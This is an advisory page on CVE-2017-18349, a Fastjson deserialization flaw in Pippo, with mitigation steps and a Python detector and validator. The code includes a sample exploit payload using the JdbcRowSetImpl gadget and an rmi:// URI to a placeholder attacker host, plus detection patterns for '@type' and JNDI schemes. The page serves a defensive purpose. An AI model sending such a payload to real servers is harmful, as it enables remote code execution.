
CVE-2017-18349 : Exploit Details and Defense Strategies

Learn about CVE-2017-18349, a Fastjson vulnerability affecting Pippo 1.11.0. Remote attackers can execute arbitrary code via a crafted JSON request. Find mitigation steps and updates here.

Fastjson parseObject function vulnerability in Pippo 1.11.0

Understanding CVE-2017-18349

Fastjson vulnerability impacting Pippo 1.11.0

What is CVE-2017-18349?

The parseObject function in Fastjson before version 1.2.25, as used by FastjsonEngine in Pippo 1.11.0 and other products, allows remote attackers to execute arbitrary code via a crafted JSON request. Fastjson's autoType feature lets a JSON object name the Java class to instantiate through an "@type" member and then feeds the remaining members to that class's setters. In the demonstrated exploit, an HTTP POST to Pippo's /json URI carries such an object with a crafted rmi:// URI in the dataSourceName field; AjaxApplication.java passes the body to parseObject, and the instantiated object resolves the attacker's RMI reference through JNDI, which leads to code execution on the server.

The Impact of CVE-2017-18349

        Remote attackers can execute arbitrary code on the server that parses the JSON request
        In Pippo, the request body is mishandled in AjaxApplication.java, which hands it to Fastjson's parseObject without restricting the classes that may be instantiated

Technical Details of CVE-2017-18349

Details of the vulnerability in Fastjson and Pippo

Vulnerability Description

        Unsafe polymorphic deserialization in Fastjson's parseObject function: a JSON "@type" member selects the Java class to instantiate
        Exploitable by remote attackers to execute arbitrary code without any prior access to the host

Affected Systems and Versions

        Fastjson versions prior to 1.2.25
        Pippo 1.11.0 and related products

Exploitation Mechanism

        Triggered by a malicious JSON object in an HTTP POST to Pippo's /json URI, with a crafted rmi:// URI in the dataSourceName field; when Fastjson instantiates the class named in the request and calls its setters, the rmi:// value is looked up through JNDI, so the server fetches and runs attacker-supplied code

Mitigation and Prevention

Protecting systems from CVE-2017-18349

Immediate Steps to Take

        Update Fastjson to version 1.2.25 or newer and leave autoType disabled (the default from 1.2.25 on)
        Apply patches provided by Pippo to address the vulnerability, or rebuild Pippo against the fixed Fastjson version

Long-Term Security Practices

        Regularly update software and libraries to the latest versions
        Validate JSON input against an allow-list of expected fields, reject any "@type" member, and deserialize into a concrete class rather than a generic object
        Egress-filter outbound RMI and LDAP connections from application servers so a JNDI lookup cannot reach an attacker-controlled host
        Conduct security audits and penetration testing to identify vulnerabilities
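The following example is added to this page and is not code from Fastjson, Pippo or the CVE record. It models the request shape described under "Exploitation Mechanism" and the allow-list validation recommended above on the receiving side. The payload is constructed for illustration: com.sun.rowset.JdbcRowSetImpl is the widely published Fastjson gadget whose dataSourceName setter triggers a JNDI lookup, and attacker.example is a placeholder host. The allowed field names (name, message) are assumed for the demonstration and are not Pippo's real AjaxApplication schema. The scanner goes beyond the single top-level case in the text: it walks nested objects and arrays and also flags ldap:// URIs, which reach the same JNDI code path.

```python
import json

# Fastjson's polymorphic-deserialization key: an object carrying it asks the parser
# to instantiate the named Java class and feed the other members to its setters.
AUTOTYPE_KEY = "@type"

# JNDI schemes an attacker-controlled dataSourceName would point at.
JNDI_SCHEMES = ("rmi://", "ldap://", "ldaps://")

# Assumed allow-list for a /json handler; Pippo's real field names are not modelled.
ALLOWED_FIELDS = {"name", "message"}

# Constructed sample payloads (not captured traffic).
MALICIOUS = json.dumps({
    "@type": "com.sun.rowset.JdbcRowSetImpl",          # published Fastjson gadget class
    "dataSourceName": "rmi://attacker.example:1099/Exploit",  # placeholder attacker host
    "autoCommit": True,                                 # setter that forces the JNDI lookup
})
BENIGN = json.dumps({"name": "alice", "message": "hello"})


def walk(node, path="$"):
    """Yield (json_path, key, value) for every member of every nested object."""
    if isinstance(node, dict):
        for key, value in node.items():
            yield f"{path}.{key}", key, value
            yield from walk(value, f"{path}.{key}")
    elif isinstance(node, list):
        for i, value in enumerate(node):
            yield from walk(value, f"{path}[{i}]")


def findings(body: str) -> list:
    """Detection side: report autoType keys and JNDI URIs anywhere in the document."""
    try:
        doc = json.loads(body)
    except ValueError as exc:
        return [f"not JSON: {exc}"]
    out = []
    for path, key, value in walk(doc):
        if key == AUTOTYPE_KEY:
            out.append(f"{path}: autoType key requests class {value!r}")
        if isinstance(value, str) and value.lower().startswith(JNDI_SCHEMES):
            out.append(f"{path}: JNDI URI {value!r}")
    return out


def validate(body: str):
    """Prevention side: allow-list validation before anything is deserialized.

    Returns (True, parsed_dict) or (False, reason). Unknown keys, including
    "@type", and non-string values are rejected outright.
    """
    try:
        doc = json.loads(body)
    except ValueError as exc:
        return False, f"not JSON: {exc}"
    if not isinstance(doc, dict):
        return False, "top-level value must be an object"
    unknown = sorted(set(doc) - ALLOWED_FIELDS)
    if unknown:
        return False, f"unexpected field(s): {unknown}"
    for key, value in doc.items():
        if not isinstance(value, str):
            return False, f"field {key!r} must be a string"
    return True, doc


if __name__ == "__main__":
    for label, body in (("malicious", MALICIOUS), ("benign", BENIGN)):
        print(label, "findings:", findings(body))
        print(label, "validate:", validate(body))
```

The two functions play different roles: findings() is what a WAF rule or log-review script would run over captured POST bodies, while validate() is what the /json handler itself should do before calling any deserializer. Rejecting unknown fields is what actually closes the hole; the "@type" and URI checks are defense in depth for a parser that still has autoType enabled.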

Patching and Updates

        Fastjson version 1.2.25 addresses the vulnerability by disabling autoType by default and checking requested class names against a deny list
        Check Pippo's release notes for a version that updates its Fastjson dependency; until then, override the dependency to 1.2.25 or newer in your own build
